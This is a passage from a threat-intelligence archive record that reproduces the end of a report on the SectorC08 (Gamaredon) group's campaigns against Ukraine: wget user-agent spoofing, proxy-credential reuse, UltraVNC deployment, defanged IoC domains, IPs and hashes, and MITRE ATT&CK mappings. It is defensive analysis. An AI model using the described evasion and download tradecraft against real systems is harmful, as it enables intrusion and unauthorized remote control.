While the user-agent is left as the default wget user agent about half the time, at other times various and even unusual user-agent strings are used, which suggests that SectorC08 sometimes knows which user-agent strings are used, or are likely to be used, in the victim environment.\r\nVersion Code\tUser-Agent\r\n07.05\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36\r\n13.05\tMozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\n13.05\tMozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1\r\n21.05\tMozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36\r\n21.05\tMozilla/5.0 (X11; Linux x86_64) Safari/537.36\r\n23.05\tMozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\n23.05\tMozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64\r\n24.05\tMozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36\r\n24.05\tMozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112\r\nU_04\tMozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0\r\nUSB_04\tMozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nUSB_07\tMozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0\r\nUSB_08\tMozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0\r\n%1_401\tMozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64\r\nosb\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36\r\nAdditionally, if a proxy is defined under “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings” through the registry values “ProxyServer”, “ProxyUser” and “ProxyPass”, those values are passed to a second invocation of wget as its “http_proxy” setting (via -e) and its “--proxy-user” and “--proxy-password” options.\r\nIn total we observed six different versions of wget being used 
by SectorC08 recently, which appear to be different builds of GNU Wget 1.11.4 and GNU Wget 1.16.\r\nStage 3 and 4 – UltraVNC\r\nThe file downloaded by wget is the stage 3 binary: another 7zSFX archive, this time containing a password-protected WinRARSFX archive which deploys UltraVNC for remote administration. Using UltraVNC for unauthorized remote administration has been a SectorC08 tactic for many years.\r\nSummary\r\nSectorC08 is a threat group that has targeted Ukraine for many years. That their tactics have changed little in all that time suggests they have achieved at least some success with them. From a technical standpoint their custom malware might appear unsophisticated, since the samples take little skill to build, but their creative use of various versions of open-source utilities, together with the modification of static details such as the 7zSFX and WinRARSFX versions used to build the executables and even the icons of every file, has consistently earned them low detection rates from security products and is likely to continue to do so.\r\nIndicators of Compromise (IoCs)\r\nHashes 
(SHA-256)\r\n26810e37b605df1a444dc9468d79d8ead28e134a9541ee67241eb50924e4236e\r\na3fbc94375920390db0d53e2dd59e7606042e047e017125904de6965a502b2f0\r\nb6addc4567145df117d14cfbe6edac98676af16ac5a2da77fb9da31734e3a50e\r\ncab1a3ede5f8b222f402896b2acc315568ee35b8bed02b4d9172cbe75a206e4e\r\n3399e9e57052410411bade73176cea11479a46a7adf866b615a6f369f3e8e9d2\r\n374fd24a31894d9090e46f7bd25cfe5192981e4df45ef7a9be128e37a9e11dde\r\n8c6673f5081bf1389bd5adb88453d86900e17aaa4b9887aa7eb1fd02bbe89dca\r\n9034b7fd62f9d655c7bbbee19f33e9d334fe57849ca938f3293cdb41647e0e89\r\n3c464eb893b719c35064a5ed60f9a204e231b3f5e960782893e4a5f1124aff3b\r\n5dae4d7bbff9ebe9f4032c009f233633baa79061efd7a9e3deaf2c0bc18ac742\r\n020c268089ff2590d27349d0ba9e748269e3afa40127f7acb9d44fcc31a0c30f\r\n73eae0ddc00d228c49ee6aa3369603fb153b56264b8092dd175c2fb49646af39\r\na7cb50745886f2535d7eefde299cdaa2f64df44163c09a779c9f859bc6304d87\r\n958a9876b158c4ef96556535a2822b2a5193259c4a71086c5ed003c8e5109b63\r\n2709dc808c0fbf6d4990466e44b15f9aa2c94569a137dbb83a95fc8e1beefb89\r\n55cdfe068487a8ca2c1bbfe852f27c9f0d1918d6d5182f28456a5af361511ce3\r\n3bbedec42b4fb9ee2624b36ebb9214d41405a399df86a9332e5cc45cf399201c\r\nbe41c927eb7445e759027b84a87426643d39f6287320ef085889b8367e311bfd\r\na800af4fb370c0afb58c4a300e4fcd7f25439d3379bdf82687a1e86848209799\r\n5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e\r\n1fa39419ea9c2e46acc1f84a6513ae05db8b66cf2fad419962c86ec32f63b5af\r\nc298f905949799fd52c162f35bea112bddc9fa2f921a47f346818d95f71a5c2e\r\n9d51ff330c2772458a8597252b9d13af4ff41e277a942a978070cb8280621760\r\n151ddd68312859bb7b13d3486b95f2f48a4cc7eea3d4f4f4ffc643f2fd34eed6\r\n78daa3f1af5489ee9926752a92e024e2ba18587e53463d81676598d5ccdc3b24\r\nabe17d0cefbbfd24a8df1607ff30628960a4bc5baf035c9d07e15628727523d3\r\ncbbd69de64be85fe1a0d63acde5bf735bd424a57c25893036bb2a16fc99cec2c\r\na8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c\r\n9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf\r\nfc3a1af59e1ff1d
1d4fe38976900708e2003d40e065b075e517cd483d440fe57\r\n1c139173ea4b615a09d27070443f6b601d8571d02fd5445cfec2ce690c276da1\r\n09c527ed64ac87b9dfce00e6ed5562d1fc508bfb018eac493cf0c02558c7a840\r\nd55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea\r\ncadb3faa4953c3e9f0f2a5204373b20a2984ee371b9d230717dbfa67e84eb9c4\r\n14212c4cc251bb1876a01b6fbcc68eb7d0f8e754cac66b417aa0589229471f14\r\n31d8d4e95d2d932c3a9cfc8aea15f8fc464290202f8d681f1e63b93cbf057c1a\r\n548b0ef8da5ec586fb47e56c852e4f7b3f3c424ed9deabc91416bdf996885820\r\ncd59b18c84e79c5fcf5a93600e06493d84c9766985ed7cfab3b9478a4c30472e\r\n39629483da85cb8bf8a32e83f54a6a89320fc9e574d657f0636207d1eb669f38\r\n2a1efabb5a1eb219ae9232a28c9e37d176dd98866c93509f11733dd9e8fce97b\r\n449dd5126d51d51b1f0f6bebea52b36c9aa196f2f2cbd6e677013e26bd832ffb\r\n22821897a44e2db6a816f54a21e34aa59234baf2d3ae54d9ecaadd0ceceffa74\r\nd708c90d51efd1a7b6bc5142b6736bd90454d943d9d6e1860cd6395918ff9ad0\r\n14e814c9cb2e0a03055163625b3099706bd92b95141831acb9150cfba1403bfa\r\n9f697822a3d4714d3b0732aead3c0b2ba14c99f183d06b0694c98a5578cc08c4\r\n601d85c0236f8d3a82fecf353adb106fac23f1681ef866783ff6e634538c9ce0\r\nba2b5092d1fb79698b6f25c4a435632887164672bd355add2c7e7ffce9a45d72\r\nd3ad9b3b0b6cee60c828c847c9ebd9f7cd5e6b6b5ef31b368b16437e48f7204f\r\n80301273fa0189a57514611a17fe79809a5c1eb044000399b7fce9a73379a9b9\r\n6ffee0a44eaf37c8f00e16e18484bebbf4cad32c9b65b7e1329284d92ca0ff5e\r\n6e524e4caa5975f391219dfe5bf03c63e9b248036b264efb7f3f37f4652348b3\r\nddcb6a9f5cb1789615985314c58d21f43140e3d53b95b92ffe7e097143cc7763\r\n80e876d46ddfb5348d9b8ea6fbb907d6c1029da3854dd3366ab4891c4967b305\r\n72bbbee65e033826b95f4e6fdea6ca124f00f007f7fb080c7568a523523c4111\r\n362b3b172c95bd9d0b04bec3878460d379e2a47e90e23ae54e5d7f991a1ea69c\r\n034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185
d40821\r\ndd1cdb0ecd48dfc9b7d500414bfc8b07b1babcbb7f8a77eb83a369dabfe8bf93\r\n1093b834938d7547181a14832c3caa95211c75af987f01745cd319e2e5144dfd\r\n9d89ac5d55568d4b37e86c52e8adae57cfe643d134858f4f1404c2e1432976df\r\nb74e88a130823bfb3fae18bc8b8c9eb2553598cb215b2559f436aa3f0875dc64\r\nwget utilities (SHA-256)\r\n92CCC276806C98C4A163855ED6532395438435DB433ECF02A04A9295F6703492\r\nF5BDE8107EC70097D786896F4AA16B96B597DBF0936F61C7856D4C686AA69B54\r\nA48AD33695A44DE887BBA8F2F3174FD8FB01A46A19E3EC9078B0118647CCF599\r\n68452CEDF3D911013B416FE13744D59B5BD15044D9DF13178FF117EA0E05C44F\r\n888BA9147BA89B5713AFE031449BE46BB20972F68839BC3546A511109A496197\r\n8B50E3CA06A22D0BE6A71232B320137C776F80AC3F2C81B7440B43854B8A3BF0\r\nEmbedded Lure Documents (SHA-256)\r\n67FF9031CE8931FCB4E2AE0E72D1D3B8A67EA39257BB7759DCEA925757A85DD8\r\n4A1B730A2AF2A498D452625CB952297630956B2236AE381051E91C53477E9C2D\r\n606C3D0AE26F6D0C17724409FBDB6960FE246FBF63B3564B06507A68BE6D2F31\r\nB511E05100B3A4F3515C5526D2DC3C873F66384225C174C65931744D9E682DC0\r\nF7E74C7FBA99E1F500A37145ADBDE8F62E3811D50E85330EBFE8B13F1C4B90CF\r\n73E3732EB46A05C1D5E4ED57F222B195C4C3AF4A2E5B9F2FBA37762F79BAF222\r\nDomains\r\nhxxp://wincreator[.]ddns[.]net\r\nhxxp://bitwork[.]ddns[.]net\r\nhxxp://winrouts[.]ddns[.]net\r\nhxxp://widusk[.]ddns[.]net\r\nhxxp://workusb[.]ddns[.]net\r\nhxxp://torrent-videos[.]ddns[.]net\r\nhxxp://sprs-files[.]ddns[.]net\r\nhxxp://sprs-updates[.]ddns[.]net\r\nhxxp://spread-new[.]ddns[.]net\r\nhxxp://drop-new[.]ddns[.]net\r\nhxxp://telo-spread[.]ddns[.]net\r\nhxxp://dropdrop[.]ddns[.]net\r\nhxxp://bitvers[.]ddns[.]net\r\nhxxp://my-certificates[.]ddns[.]net\r\nhxxp://kristousb[.]ddns[.]net\r\nhxxp://my-work[.]ddns[.]net\r\nhxxp://spr-d2[.]ddns[.]net\r\nhxxp://military-ua[.]ddns[.]net\r\nhxxp://bitlocker[.]ddns[.]net\r\nhxxp://const-gov[.]ddns[.]net\r\nhxxp://tor-file[.]ddns[.]net\r\nhxxp://torrent-vnc[.]ddns[.]net\r\nhxxp://versiya-spread[.]myftp[.]org\r\nhxxp://spread[.]crimea[.]com\r\nhxxp://dropper[.]crimea[.]com\r\nhxxp://torrent-stel[.]space\r\nhxxp://torrent-supd[.]space\r\nIP Addresses\r\n5[.]23[.]55[.]212\r\n80[.]211[.]167[.]231\r\n84[.]78[.]25[.]153\r\n91[.]226[.]81[.]235\r\n94[.]154[.]11[.]23\r\n95[.]142[.]45[.]48\r\n142[.]93[.]110[.]250\r\n185[.]158[.]115[.]137\r\n185[.]158[.]114[.]95\r\n185[.]231[.]154[.]122\r\n185[.]231[.]154[.]154\r\n185[.]231[.]155[.]12\r\n185[.]231[.]155[.]69\r\n185[.]231[.]155[.]209\r\n185[.]248[.]100[.]104\r\n185[.]248[.]100[.]121\r\n185[.]248[.]100[.]142\r\n193[.]19[.]118[.]65\r\n193[.]19[.]118[.]238\r\n195[.]2[.]253[.]218\r\n195[.]62[.]52[.]91\r\n195[.]62[.]52[.]119\r\n195[.]62[.]52[.]160\r\n195[.]62[.]52[.]164\r\n195[.]62[.]53[.]158\r\n195[.]88[.]208[.]26\r\n195[.]88[.]208[.]51\r\n195[.]88[.]208[.]133\r\n195[.]88[.]208[.]157\r\n195[.]88[.]209[.]136\r\nMITRE ATT\u0026CK Techniques\r\nThe following is a list of MITRE ATT\u0026CK Techniques we have observed 
based on our analysis of this malware.\r\nInitial Access\r\nT1091 Replication Through Removable Media\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1085 Rundll32\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nT1047 Windows Management Instrumentation\r\nPersistence\r\nT1158 Hidden Files and Directories\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nT1023 Shortcut Modification\r\nDefense Evasion\r\nT1158 Hidden Files and Directories\r\nT1036 Masquerading\r\nT1085 Rundll32\r\nT1064 Scripting\r\nT1027 Obfuscated Files or Information\r\nDiscovery\r\nT1057 Process Discovery\r\nT1012 Query Registry\r\nT1082 System Information Discovery\r\nT1016 System Network Configuration Discovery\r\nT1124 System Time Discovery\r\nT1497 Virtualization/Sandbox Evasion\r\nCommand and Control\r\nT1043 Commonly Used Port\r\nT1065 Uncommonly Used Port\r\nT1219 Remote Access Tools\r\nT1071 Standard Application Layer Protocol\r\nSource: https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/"
	],
	"report_names": [
		"sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine"
	],
	"threat_actors": [
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434170,
	"ts_updated_at": 1775792141,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.pdf",
		"text": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.txt",
		"img": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.jpg"
	}
}